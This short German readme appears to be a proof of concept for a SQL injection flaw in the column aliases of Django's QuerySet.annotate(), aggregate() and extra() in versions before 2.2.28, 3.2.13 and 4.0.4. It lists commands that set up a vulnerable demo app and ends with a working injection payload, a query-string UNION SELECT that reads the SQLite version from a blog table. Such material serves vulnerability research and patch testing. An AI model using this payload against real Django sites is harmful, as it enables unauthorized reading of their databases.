
Ein Problem wurde in Django 2.2 vor 2.2.28, 3.2 vor 3.2.13 und 4.0 vor 4.0.4 entdeckt. Die Methoden QuerySet.annotate(), aggregate() und extra() sind anfällig für SQL-Injection in Spalten-Aliasen über ein manipuliertes Wörterbuch (mit Wörterbuch-Expansion), das als **kwargs übergeben wird.
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --
